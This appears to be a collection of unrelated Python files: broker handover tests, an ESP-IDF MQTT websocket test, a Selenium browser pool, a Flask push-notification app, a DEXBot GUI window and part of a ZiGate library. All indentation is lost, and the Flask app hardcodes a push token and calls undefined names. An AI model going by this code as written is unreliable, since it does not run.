print(pretty)
handover = factory.make_master('master')
client = RemoteBroker(handover.address, home=factory.HOME.path)
# make first allocation
h,w = client.get_resources({'type':'handset'}, {'type':'workspace'})
# hand over
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# make seconc allocation
try:
client.get({'type':'handset'})
print('FAIL %s: second allocation did not fail' % pretty)
return False
except Restarting:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
return True
# check that a restarted share shows up again in its master
@setup.factory()
def t10(factory):
pretty = '%s t10' % __file__
print(pretty)
master = factory.make_master('master')
share = factory.make_share(master, 'share')
share.start_sharing()
time.sleep(1)
client = RemoteBroker(address=master.address, home=factory.HOME.path)
h = client.get_resources({'type':'handset', 'serial':'share-1'})
a1 = master.list_available()
# restart the share
adoption,config,fdtx_path = share.begin_handover()
takeover = factory.make_takeover('share', adoption, config, fdtx_path)
a2 = master.list_available()
if len(a1) == len(a2):
print('FAIL %s: shared resources still visible: %s' % (pretty, a2))
return False
# finish the handover so that takeover can start accepting RPC's. then
# check that the master sees all equipment except the one allocated
share.end_handover(1)
ok = False
for i in range(10):
a3 = master.list_available()
if len(a3) == len(a1):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong availability: %s' % (pretty, a3))
return False
for profile in a3:
if 'serial' in profile and profile['serial'] == 'share-1':
print('FAIL %s: busy equipment shared' % pretty)
return False
# finally check that the resource can still be manipulated
try:
p = h.get_profile()
if p['serial'] != 'share-1':
print('FAIL %s: wrong profile: %s' % (pretty, p))
return False
except Exception, e:
print('FAIL %s: unexpected error: %s' % (pretty, e))
return False
return True
# check that shares reconnect to a restarted master
@setup.factory()
def t11(factory):
pretty = '%s t11' % __file__
print(pretty)
master = factory.make_master('master')
share = factory.make_share(master, 'share')
share.start_sharing()
time.sleep(1)
client = RemoteBroker(address=master.address, home=factory.HOME.path)
h1 = client.get_resources({'type':'handset', 'serial':'share-1'})
h2 = client.get_resources({'type':'handset', 'serial':'master-1'})
a1 = master.list_available()
# restart the master
adoption,config,fdtx_path = master.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
master.end_handover(1)
# connect to the new master and check the availability again
master = RemoteBroker(address=master.address, home=factory.HOME.path)
ok = False
for i in range(10):
a2 = master.list_available()
if len(a2) == len(a1):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong availability: %s' % (pretty, a2))
return False
for profile in a2:
if 'serial' in profile and profile['serial'] == 'share-1':
print('FAIL %s: busy equipment shared' % pretty)
return False
return True
# check that .end_handover() doesn't time out even if the takeover did not get
# any sessions to adopt. regression test
@setup.factory()
def t12(factory):
pretty = '%s t12' % __file__
print(pretty)
master = factory.make_master('master')
adoption,config,fdtx_path = master.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
try:
master.end_handover(1)
except ConnectionClosed:
pass
except Exception, e:
print('FAIL %s: unexpected error: %s' % (pretty, e))
return False
return True
# check that the handover exits when the last session terminates
@setup.factory()
def t13(factory):
pretty = '%s t13' % __file__
print(pretty)
handover = factory.make_master('master')
# make some sessions
c1 = RemoteBroker(handover.address, home=factory.HOME.path)
h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
avail_2 = handover.list_available()
c2 = RemoteBroker(handover.address, home=factory.HOME.path)
h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
avail_3 = handover.list_available()
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# crash the sessions
session = RemoteSession(h1.address, h1.authkey)
try:
session.crash()
except ConnectionClosed:
pass
session = RemoteSession(h2.address, h2.authkey)
try:
session.crash()
except ConnectionClosed:
pass
for i in range(10): # wait until only one session remains, then close it
authkeys = handover.get_session_authkeys()
if len(authkeys) == 1:
break
time.sleep(0.3)
# check that the handover sends its exit message when the last session is
# closed
try:
handover.close_session(authkeys[0])
except Exit, e:
if str(e) != 'broker restarted. please reconnect':
print('FAIL %s: wrong exit message: %s' % (pretty, str(e)))
return False
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
try:
handover.ping() # ping
except ConnectionClosed:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
return True
|
mqtt_ws_example_test.py | from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
import re
import os
import sys
import paho.mqtt.client as mqtt
from threading import Thread, Event
try:
import IDF
except Exception:
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
event_client_connected = Event()
event_stop_client = Event()
event_client_received_correct = Event()
message_log = ""
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
event_client_connected.set()
client.subscribe("/topic/qos0")
def mqtt_client_task(client):
while not event_stop_client.is_set():
client.loop()
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
global message_log
payload = msg.payload.decode()
if not event_client_received_correct.is_set() and payload == "data":
client.publish("/topic/qos0", "data_to_esp32")
if msg.topic == "/topic/qos0" and payload == "data":
event_client_received_correct.set()
message_log += "Received data:" + msg.topic + " " + payload + "\n"
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_ws(env, extra_data):
broker_url = ""
broker_port = 0
"""
steps: |
1. join AP and connects to ws broker
2. Test connects a client to the same broker
3. Test evaluates it received correct qos0 message
4. Test ESP32 client received correct qos0 message
"""
dut1 = env.get_dut("mqtt_websocket", "examples/protocols/mqtt/ws")
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_websocket.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("mqtt_websocket_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("mqtt_websocket_size", bin_size // 1024)
# Look for host:port in sdkconfig
try:
value = re.search(r'\:\/\/([^:]+)\:([0-9]+)', dut1.app.get_sdkconfig()["CONFIG_BROKER_URI"])
broker_url = value.group(1)
broker_port = int(value.group(2))
except Exception:
print('ENV_TEST_FAILURE: Cannot find broker url in sdkconfig')
raise
client = None
# 1. Test connects to a broker
try:
client = mqtt.Client(transport="websockets")
client.on_connect = on_connect
client.on_message = on_message
print("Connecting...")
client.connect(broker_url, broker_port, 60)
except Exception:
print("ENV_TEST_FAILURE: Unexpected error while connecting to broker {}: {}:".format(broker_url, sys.exc_info()[0]))
raise
# Starting a py-client in a separate thread
thread1 = Thread(target=mqtt_client_task, args=(client,))
thread1.start()
try:
print("Connecting py-client to broker {}:{}...".format(broker_url, broker_port))
if not event_client_connected.wait(timeout=30):
raise ValueError("ENV_TEST_FAILURE: Test script cannot connect to broker: {}".format(broker_url))
dut1.start_app()
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
print('ENV_TEST_FAILURE: Cannot connect to AP')
raise
print("Checking py-client received msg published from esp...")
if not event_client_received_correct.wait(timeout=30):
raise ValueError('Wrong data received, msg log: {}'.format(message_log))
print("Checking esp-client received msg published from py-client...")
dut1.expect(re.compile(r"DATA=data_to_esp32"), timeout=30)
finally:
event_stop_client.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mqtt_ws()
|
browser_pool.py | import threading
import time
from queue import Queue, Empty
import psutil as psutil
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
'''
* -------------------------------------------------
* * Browser_Pool
* @discribe : Browser Pool
*
* @author : Ma Xuefeng
* @date : 2018/3/28
* -------------------------------------------------
'''
#============= Object ======================
browser_pool = None # Browser Pool Object
#============= Config ======================
browser_amount = 0 # If browser_amount <= 0 , means unlimit, then lazy_load must be True
minimize = False
memory_rate = 90
lazy_load = True
log_silence = True # 输出安静
#== Option Config ==
load_picture = False
head_less = False
#=======================================
if not load_picture or head_less:
use_chrome_options = True
chrome_options = Options()
if not load_picture:
chrome_options.add_experimental_option('prefs', {
'profile.default_content_setting_values': {
'images': 2
}
})
if head_less:
chrome_options.add_argument('--headless')
#============= Program ====================
class Browser_Pool:
'''
浏览器池
'''
def __init__(self):
self.browsers = []
self._acquire_queue = Queue(maxsize=-1)
self._done = False
self._create_browser()
self._acquire()
self._cleaner()
def _create_browser(self):
'''
创建 浏览器
:param id:浏览器编号
'''
def create(id):
browser = Browser(id, self)
self.browsers.append(browser)
threads = []
if not lazy_load and browser_amount>0:
for index in range(browser_amount):
thread = threading.Thread(target=create, args=(index,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def close(self):
'''
销毁 浏览器池
'''
self.clean()
self._done = True
def _acquire(self,):
'''
监听/分配 浏览器 线程
'''
def distribut():
while not self._done:
try:
bowl = self._acquire_queue.get(timeout=0.5)
except Empty:
if self._done:
break
else:
continue
found = False
while not found:
for browser in self.browsers:
if browser.vailiable:
browser.vailiable = False
bowl.bowl = browser
found = True
break
if bowl.isclean : break
if not found and (browser_amount<1 or len(self.browsers)<browser_amount) \
and psutil.virtual_memory().percent<memory_rate:
browser = Browser(len(self.browsers), self)
self.browsers.append(browser)
browser.vailiable = False
bowl.bowl = browser
found = True
if not found:
time.sleep(0.05)
threading.Thread(target=distribut).start()
class _Bowl:
'''
申请 碗
'''
def __init__(self, isclean = False):
self.isclean = isclean
self.bowl = None
def acquire(self):
'''
申请 浏览器
'''
bowl = self._Bowl()
self._acquire_queue.put(bowl)
while bowl.bowl == None:
time.sleep(0.05)
return bowl.bowl
def _acquire_for_cleaner(self):
'''
申请 浏览器 for cleaner
'''
bowl = self._Bowl(isclean=True)
self._acquire_queue.put(bowl)
while bowl.bowl == None and len(self.browsers)>0:
time.sleep(0.05)
return bowl.bowl
def _cleaner(self):
'''
自清理,高于内存使用率时 自动清理多余浏览器
'''
def cleanner():
while not self._done:
if psutil.virtual_memory().percent >= memory_rate:
browser = self._acquire_for_cleaner()
if browser != None:
browser.destroy_by_force()
time.sleep(0.05)
threading.Thread(target=cleanner).start()
def clean(self):
'''
清空 浏览器池
'''
def destroy_browser(browser):
if browser != None:
c_out('浏览器[{}] 已被销毁。'.format(browser.id))
browser.destroy_by_force()
while len(self.browsers)>0:
browser = self._acquire_for_cleaner()
threading.Thread(target=destroy_browser, args=(browser,)).start()
time.sleep(0.05)
class Browser(webdriver.Chrome):
'''
浏览器 驱动
'''
def __init__(self, id : int = -1, browser_pool=None):
'''
Initialize
:param id:Browser Id, If id is defult(-1) means nameless
'''
if use_chrome_options:
super(Browser, self).__init__(chrome_options = chrome_options)
else:
super(Browser, self).__init__()
self.browser_pool = None
self.id = id
self.vailiable = True
if browser_pool != None:
self.browser_pool = browser_pool
c_out('浏览器[{}] 已被创建。'.format(id))
if minimize:
self.set_window_size(0, 0)
def release(self, str = None):
if str != None:
print(str)
self.get('about:blank')
self.vailiable = True
c_out('浏览器编号[{}] 已被释放。'.format(self.id))
def destroy_by_force(self):
self.quit()
self.browser_pool.browsers.remove(self)
def browser_amount(self):
amount = len(self.browser_pool.browsers)
c_out('当前浏览器数量 : {}'.format(amount))
return amount
def c_out(*args):
if not log_silence:
print('\033[0;32;0m', end='')
print(*args, '\033[0m')
#=============== Object =======================
# 浏览器池 引用
browser_pool = Browser_Pool()
#=============== Test =======================
def run():
import time
browser = browser_pool.acquire()
browser.get('http://baidu.com')
browser.release()
time.sleep(1)
browser_pool.close()
if __name__ == '__main__':
run()
|
app.py | #----------------------------------------------------------------------------#
# Imports
#----------------------------------------------------------------------------#
from flask import Flask, render_template, request
# from flask.ext.sqlalchemy import SQLAlchemy
import logging
from logging import Formatter, FileHandler
from forms import *
import os
import sys
from sys import stderr
import json
import threading
from exponent_server_sdk import PushClient
from exponent_server_sdk import PushMessage
from exponent_server_sdk import PushResponseError
from exponent_server_sdk import PushServerError
from requests.exceptions import ConnectionError
from requests.exceptions import HTTPError
from babyClass import loop
#----------------------------------------------------------------------------#
# Data
#----------------------------------------------------------------------------#
tokens = []
TEST_TOKEN = 'ExponentPushToken[2AOjhoJRkkJVEpl2FoWwuc]'
EXTENSIONS = ['wav', 'mp3']
events = []
#----------------------------------------------------------------------------#
# App Config.
#----------------------------------------------------------------------------#
app = Flask(__name__)
app.config.from_object('config')
#db = SQLAlchemy(app)
# Automatically tear down SQLAlchemy.
'''
@app.teardown_request
def shutdown_session(exception=None):
db_session.remove()
'''
# Login required decorator.
'''
def login_required(test):
@wraps(test)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return test(*args, **kwargs)
else:
flash('You need to login first.')
return redirect(url_for('login'))
return wrap
'''
# Methods
# Basic arguments. You should extend this function with the push features you
# want to use, or simply pass in a `PushMessage` object.
def send_push_message(token, message, extra=None):
try:
response = PushClient().publish(
PushMessage(to=token,
body=message,
data=extra))
except PushServerError as exc:
# Encountered some likely formatting/validation error.
rollbar.report_exc_info(
extra_data={
'token': token,
'message': message,
'extra': extra,
'errors': exc.errors,
'response_data': exc.response_data,
})
raise
except (ConnectionError, HTTPError) as exc:
# Encountered some Connection or HTTP error - retry a few times in
# case it is transient.
rollbar.report_exc_info(
extra_data={'token': token, 'message': message, 'extra': extra})
raise self.retry(exc=exc)
try:
# We got a response back, but we don't know whether it's an error yet.
# This call raises errors so we can handle them with normal exception
# flows.
response.validate_response()
except DeviceNotRegisteredError:
# Mark the push token as inactive
from notifications.models import PushToken
PushToken.objects.filter(token=token).update(active=False)
except PushResponseError as exc:
# Encountered some other per-notification error.
rollbar.report_exc_info(
extra_data={
'token': token,
'message': message,
'extra': extra,
'push_response': exc.push_response._asdict(),
})
raise self.retry(exc=exc)
def valid_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in EXTENSIONS
#----------------------------------------------------------------------------#
# Controllers.
#----------------------------------------------------------------------------#
@app.route('/')
def home():
return render_template('pages/placeholder.home.html')
@app.route('/getdata', methods=['GET'])
def getData():
return json.dumps(events)
@app.route('/sendaudio', methods=['POST'])
def send_audio():
print(request.files)
f = request.files.get('file', None)
if f and valid_file(f.filename):
f.save('../classfier/sound-downloader/testing/recording.wav')
return '''<h1>Audio sent</h1>'''
@app.route('/notify', methods=['POST'])
def notify():
notify_type = request.json['type']
print(notify_type, 'NOTIFIED', file=stderr)
# if (len(tokens) > 0):
send_push_message(TEST_TOKEN, notify_type)
events.append(notify_type)
# else:
# print('Notification not sent: no token found', file=stderr)
return '''<h1>notified {}</h1>'''.format(notify_type)
@app.route('/register', methods=['POST'])
def register():
tokens.append(request.json['token']['value'])
print(request.json['token']['value'], 'TOKEN RECEIVED', file=stderr)
return '''<h1>token received. tokens now {}'''.format(tokens)
@app.route('/about')
def about():
return render_template('pages/placeholder.about.html')
# Error handlers.
@app.errorhandler(500)
def internal_error(error):
#db_session.rollback()
return render_template('errors/500.html'), 500
@app.errorhandler(404)
def not_found_error(error):
return render_template('errors/404.html'), 404
if not app.debug:
file_handler = FileHandler('error.log')
file_handler.setFormatter(
Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')
)
app.logger.setLevel(logging.INFO)
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
app.logger.info('errors')
#----------------------------------------------------------------------------#
# Launch.
#----------------------------------------------------------------------------#
# Default port:
if __name__ == '__main__':
threading.Thread(target=loop).start()
app.run(host='bigrip.ocf.berkeley.edu')
# Or specify port manually:
'''
if __name__ == '__main__':
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port)
'''
|
worker_list.py | import time
from threading import Thread
import webbrowser
from dexbot import __version__
from dexbot.config import Config
from dexbot.controllers.wallet_controller import WalletController
from dexbot.views.create_wallet import CreateWalletView
from dexbot.views.create_worker import CreateWorkerView
from dexbot.views.errors import gui_error
from dexbot.views.layouts.flow_layout import FlowLayout
from dexbot.views.settings import SettingsView
from dexbot.views.ui.worker_list_window_ui import Ui_MainWindow
from dexbot.views.unlock_wallet import UnlockWalletView
from dexbot.views.worker_item import WorkerItemWidget
from dexbot.qt_queue.idle_queue import idle_add
from dexbot.qt_queue.queue_dispatcher import ThreadDispatcher
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtGui import QFontDatabase
from PyQt5.QtWidgets import QMainWindow
from grapheneapi.exceptions import NumRetriesReached
class MainView(QMainWindow, Ui_MainWindow):
def __init__(self, main_controller):
super().__init__()
self.setupUi(self)
self.main_controller = main_controller
self.config = main_controller.config
self.max_workers = 10
self.num_of_workers = 0
self.worker_widgets = {}
self.closing = False
self.status_bar_updater = None
self.statusbar_updater_first_run = True
self.main_controller.set_info_handler(self.set_worker_status)
self.layout = FlowLayout(self.scrollAreaContent)
self.dispatcher = None
# GUI buttons
self.add_worker_button.clicked.connect(self.handle_add_worker)
self.settings_button.clicked.connect(self.handle_open_settings)
self.help_button.clicked.connect(self.handle_open_documentation)
self.unlock_wallet_button.clicked.connect(self.handle_login)
# Hide certain buttons by default until login success
self.add_worker_button.hide()
self.status_bar.showMessage("ver {} - Node disconnected".format(__version__))
QFontDatabase.addApplicationFont(":/bot_widget/font/SourceSansPro-Bold.ttf")
def connect_to_bitshares(self):
# Check if there is already a connection
if self.config['node']:
# Test nodes first. This only checks if we're able to connect
self.status_bar.showMessage('Connecting to LocalCoin...')
try:
self.main_controller.measure_latency(self.config['node'])
except NumRetriesReached:
self.status_bar.showMessage('ver {} - Coudn\'t connect to LocalCoin. '
'Please use different node(s) and retry.'.format(__version__))
self.main_controller.set_bitshares_instance(None)
return False
self.main_controller.new_bitshares_instance(self.config['node'])
self.status_bar.showMessage(self.get_statusbar_message())
return True
else:
# Config has no nodes in it
self.status_bar.showMessage('ver {} - Node(s) not found. '
'Please add node(s) from settings.'.format(__version__))
return False
@pyqtSlot(name='handle_login')
def handle_login(self):
if not self.main_controller.bitshares_instance:
if not self.connect_to_bitshares():
return
wallet_controller = WalletController(self.main_controller.bitshares_instance)
if wallet_controller.wallet_created():
unlock_view = UnlockWalletView(wallet_controller)
else:
unlock_view = CreateWalletView(wallet_controller)
if unlock_view.exec_():
# Hide button once successful wallet creation / login
self.unlock_wallet_button.hide()
self.add_worker_button.show()
# Load worker widgets from config file
workers = self.config.workers_data
for worker_name in workers:
self.add_worker_widget(worker_name)
# Limit the max amount of workers so that the performance isn't greatly affected
if self.num_of_workers >= self.max_workers:
self.add_worker_button.setEnabled(False)
break
# Dispatcher polls for events from the workers that are used to change the ui
self.dispatcher = ThreadDispatcher(self)
self.dispatcher.start()
self.status_bar.showMessage("ver {} - Node delay: - ms".format(__version__))
self.status_bar_updater = Thread(target=self._update_statusbar_message)
self.status_bar_updater.start()
def add_worker_widget(self, worker_name):
config = self.config.get_worker_config(worker_name)
widget = WorkerItemWidget(worker_name, config, self.main_controller, self)
widget.setFixedSize(widget.frameSize())
self.layout.addWidget(widget)
self.worker_widgets[worker_name] = widget
# Limit the max amount of workers so that the performance isn't greatly affected
self.num_of_workers += 1
if self.num_of_workers >= self.max_workers:
self.add_worker_button.setEnabled(False)
def remove_worker_widget(self, worker_name):
self.worker_widgets.pop(worker_name, None)
self.num_of_workers -= 1
if self.num_of_workers < self.max_workers:
self.add_worker_button.setEnabled(True)
def change_worker_widget_name(self, old_worker_name, new_worker_name):
worker_data = self.worker_widgets.pop(old_worker_name)
self.worker_widgets[new_worker_name] = worker_data
@pyqtSlot(name='handle_add_worker')
@gui_error
def handle_add_worker(self):
create_worker_dialog = CreateWorkerView(self.main_controller.bitshares_instance)
return_value = create_worker_dialog.exec_()
# User clicked save
if return_value == 1:
worker_name = create_worker_dialog.worker_name
self.main_controller.create_worker(worker_name)
self.config.add_worker_config(worker_name, create_worker_dialog.worker_data)
self.add_worker_widget(worker_name)
@pyqtSlot(name='handle_open_settings')
@gui_error
def handle_open_settings(self):
settings_dialog = SettingsView()
reconnect = settings_dialog.exec_()
if reconnect:
# Reinitialize config after closing the settings window
self.config = Config()
self.main_controller.config = self.config
self.connect_to_bitshares()
@staticmethod
@pyqtSlot(name='handle_open_documentation')
def handle_open_documentation():
webbrowser.open('https://github.com/LocalCoinIS/DEXBot/wiki')
def set_worker_name(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_name(value)
def set_worker_account(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_account(value)
def set_worker_profit(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_profit(value)
def set_worker_market(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_market(value)
def set_worker_slider(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_slider(value)
def customEvent(self, event):
# Process idle_queue_dispatcher events
event.callback()
def closeEvent(self, event):
self.closing = True
self.status_bar.showMessage("Closing app...")
if self.status_bar_updater and self.status_bar_updater.is_alive():
self.status_bar_updater.join()
def _update_statusbar_message(self):
while not self.closing:
# When running first time the workers are also interrupting with the connection
# so we delay the first time to get correct information
if self.statusbar_updater_first_run:
self.statusbar_updater_first_run = False
time.sleep(1)
msg = self.get_statusbar_message()
idle_add(self.set_statusbar_message, msg)
runner_count = 0
# Wait for 30s but do it in 0.5s pieces to not prevent closing the app
while not self.closing and runner_count < 60:
runner_count += 1
time.sleep(0.5)
def get_statusbar_message(self):
node = self.main_controller.bitshares_instance.rpc.url
try:
latency = self.main_controller.measure_latency(node)
except BaseException:
latency = -1
if latency != -1:
return "ver {} - Node delay: {:.2f}ms - node: {}".format(__version__, latency, node)
else:
return "ver {} - Node disconnected".format(__version__)
def set_statusbar_message(self, msg):
self.status_bar.showMessage(msg)
def set_worker_status(self, worker_name, level, status):
if worker_name != 'NONE':
worker = self.worker_widgets.get(worker_name, None)
if worker:
worker.set_status(status)
|
core.py | #! /usr/bin/python3
#
# Copyright (c) 2018 Sébastien RAMAGE
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
#
from binascii import hexlify
import traceback
from time import (sleep, strftime, monotonic)
import logging
import json
import os
from pydispatch import dispatcher
from .transport import (ThreadSerialConnection,
ThreadSocketConnection,
FakeTransport)
from .responses import (RESPONSES, Response)
from .const import (ACTIONS_COLOR, ACTIONS_LEVEL, ACTIONS_LOCK, ACTIONS_HUE,
ACTIONS_ONOFF, ACTIONS_TEMPERATURE, ACTIONS_COVER,
ACTIONS_THERMOSTAT, ACTIONS_IAS,
OFF, ON, TYPE_COORDINATOR, STATUS_CODES,
ZIGATE_ATTRIBUTE_ADDED, ZIGATE_ATTRIBUTE_UPDATED,
ZIGATE_DEVICE_ADDED, ZIGATE_DEVICE_REMOVED,
ZIGATE_DEVICE_UPDATED, ZIGATE_DEVICE_ADDRESS_CHANGED,
ZIGATE_PACKET_RECEIVED, ZIGATE_DEVICE_NEED_DISCOVERY,
ZIGATE_RESPONSE_RECEIVED, DATA_TYPE, BASE_PATH)
from .clusters import (Cluster, get_cluster)
import functools
import struct
import threading
import random
from enum import Enum
import colorsys
import datetime
try:
import RPi.GPIO as GPIO
except Exception:
# Fake GPIO
class GPIO:
def fake(self, *args, **kwargs):
LOGGER.error('GPIO Not available')
def __getattr__(self, *args, **kwargs):
return self.fake
GPIO = GPIO()
import usb
LOGGER = logging.getLogger('zigate')
AUTO_SAVE = 5 * 60 # 5 minutes
BIND_REPORT = True # automatically bind and report state for light
SLEEP_INTERVAL = 0.1
ACTIONS = {}
WAIT_TIMEOUT = 5
DETECT_FASTCHANGE = False # enable fast change detection
DELAY_FASTCHANGE = 1.0 # delay fast change for cluster 0x0006
# Device id
ACTUATORS = [0x0009, 0x0010, 0x0051, 0x000a,
0x010a, 0x010b, 0x010c, 0x010d,
0x0100, 0x0101, 0x0102, 0x0103, 0x0105, 0x0110,
0x0200, 0x0202, 0x0210, 0x0220,
0x0301,
0x0403]
# On/off light 0x0000
# On/off plug-in unit 0x0010
# Dimmable light 0x0100
# Dimmable plug-in unit 0x0110
# Color light 0x0200
# Extended color light 0x0210
# Color temperature light 0x0220
# On/Off Light 0x0100 Section 3.1
# Dimmable Light 0x0101 Section 3.2
# Colour Dimmable Light 0x0102 Section 3.3
# On/Off Light Switch 0x0103 Section 3.4
# Dimmer Switch 0x0104 Section 3.5
# Colour Dimmer Switch 0x0105 Section 3.6
# Light Sensor 0x0106 Section 3.7
# Occupancy Sensor 0x0107 Section 3.8
# On/Off Ballast 0x0108 Section 3.9
# Dimmable Ballast 0x0109 Section 3.10
# On/Off Plug-in Unit 0x010A Section 3.11
# Dimmable Plug-in Unit 0x010B Section 3.12
# Colour Temperature Light 0x010C Section 3.13
# Extended Colour Light 0x010D Section 3.14
# Light Level Sensor 0x010E Section 3.15
# Colour Controller 0x0800 Section 3.16
# Colour Scene Controller 0x0810 Section 3.17
# Non-Colour Controller 0x0820 Section 3.18
# Non-Colour Scene Controller 0x0830 Section 3.19
# Control Bridge 0x0840 Section 3.20
# On/Off Sensor 0x0850 Section 3.21
def register_actions(action):
def decorator(func):
if action not in ACTIONS:
ACTIONS[action] = []
ACTIONS[action].append(func.__name__)
return func
return decorator
class AddrMode(Enum):
bound = 0
group = 1
short = 2
ieee = 3
def hex_to_rgb(h):
''' convert hex color to rgb tuple '''
h = h.strip('#')
return tuple(int(h[i:i + 2], 16) / 255 for i in (0, 2, 4))
def rgb_to_xy(rgb):
''' convert rgb tuple to xy tuple '''
red, green, blue = rgb
r = ((red + 0.055) / (1.0 + 0.055))**2.4 if (red > 0.04045) else (red / 12.92)
g = ((green + 0.055) / (1.0 + 0.055))**2.4 if (green > 0.04045) else (green / 12.92)
b = ((blue + 0.055) / (1.0 + 0.055))**2.4 if (blue > 0.04045) else (blue / 12.92)
X = r * 0.664511 + g * 0.154324 + b * 0.162028
Y = r * 0.283881 + g * 0.668433 + b * 0.047685
Z = r * 0.000088 + g * 0.072310 + b * 0.986039
cx = 0
cy = 0
if (X + Y + Z) != 0:
cx = X / (X + Y + Z)
cy = Y / (X + Y + Z)
return (cx, cy)
def hex_to_xy(h):
''' convert hex color to xy tuple '''
return rgb_to_xy(hex_to_rgb(h))
def dispatch_signal(signal=dispatcher.Any, sender=dispatcher.Anonymous,
*arguments, **named):
'''
Dispatch signal with exception proof
'''
LOGGER.debug('Dispatch %s', signal)
try:
dispatcher.send(signal, sender, *arguments, **named)
except Exception:
LOGGER.error('Exception dispatching signal %s', signal)
LOGGER.error(traceback.format_exc())
def ftdi_set_bitmode(dev, bitmask):
'''
Set mode for ZiGate DIN module
'''
BITMODE_CBUS = 0x20
SIO_SET_BITMODE_REQUEST = 0x0b
bmRequestType = usb.util.build_request_type(usb.util.CTRL_OUT,
usb.util.CTRL_TYPE_VENDOR,
usb.util.CTRL_RECIPIENT_DEVICE)
wValue = bitmask | (BITMODE_CBUS << BITMODE_CBUS)
dev.ctrl_transfer(bmRequestType, SIO_SET_BITMODE_REQUEST, wValue)
class ZiGate(object):
def __init__(self, port='auto', path='~/.zigate.json',
auto_start=True,
auto_save=True,
channel=None,
adminpanel=False):
self._model = 'TTL' # TTL, WiFI, DIN, GPIO
self._devices = {}
self._groups = {}
self._scenes = {}
self._led = True
self._neighbours_table_cache = []
self._building_neighbours_table = False
self._path = path
self._version = None
self._port = port
self._last_response = {} # response to last command type
self._last_status = {} # status to last command type
self._save_lock = threading.Lock()
self._autosavetimer = None
self._closing = False
self.connection = None
self._addr = '0000'
self._ieee = None
self.panid = 0
self.extended_panid = 0
self.channel = 0
self._started = False
self._no_response_count = 0
self._ota_reset_local_variables()
if self.model == 'DIN':
self.set_running_mode()
if adminpanel:
self.start_adminpanel()
if auto_start:
self.startup(channel)
if auto_save:
self.start_auto_save()
@property
def model(self):
'''
return ZiGate model:
TTL, WiFi, GPIO, DIN
'''
if self.connection:
if self.connection.vid_pid() == (0x0403, 0x6001):
self._model = 'DIN'
return self._model
def set_bootloader_mode(self):
'''
configure ZiGate DIN in flash mode
'''
if self.model != 'DIN':
LOGGER.warning('Method only supported on ZiGate DIN')
return
dev = usb.core.find(idVendor=0x0403, idProduct=0x6001)
if not dev:
LOGGER.error('ZiGate DIN not found.')
return
ftdi_set_bitmode(dev, 0x00)
sleep(0.5)
# Set CBUS2/3 high...
ftdi_set_bitmode(dev, 0xCC)
sleep(0.5)
# Set CBUS2/3 low...
ftdi_set_bitmode(dev, 0xC0)
sleep(0.5)
ftdi_set_bitmode(dev, 0xC4)
sleep(0.5)
# Set CBUS2/3 back to tristate
ftdi_set_bitmode(dev, 0xCC)
sleep(0.5)
def set_running_mode(self):
'''
configure ZiGate DIN in running mode
'''
if self.model != 'DIN':
LOGGER.warning('Method only supported on ZiGate DIN')
return
dev = usb.core.find(idVendor=0x0403, idProduct=0x6001)
if not dev:
LOGGER.error('ZiGate DIN not found.')
return
ftdi_set_bitmode(dev, 0xC8)
sleep(0.5)
ftdi_set_bitmode(dev, 0xCC)
sleep(0.5)
def flash_firmware(self, path, erase_eeprom=False):
'''
flash specified firmware
'''
if self.model != 'DIN':
LOGGER.warning('Method only supported on ZiGate DIN')
return
from .flasher import flash
self.set_bootloader_mode()
flash(self._port, write=path, erase=erase_eeprom)
self.set_running_mode()
@property
def ieee(self):
return self._ieee
@property
def addr(self):
return self._addr
def start_adminpanel(self, port=None, mount=None, prefix=None, debug=False):
'''
Start Admin panel in other thread
'''
from .adminpanel import start_adminpanel, ADMINPANEL_PORT
port = port or ADMINPANEL_PORT
self.adminpanel = start_adminpanel(self, port=port, mount=mount, prefix=prefix, quiet=not debug, debug=debug)
return self.adminpanel
def _event_loop(self):
while not self._closing:
if self.connection and not self.connection.received.empty():
packet = self.connection.received.get()
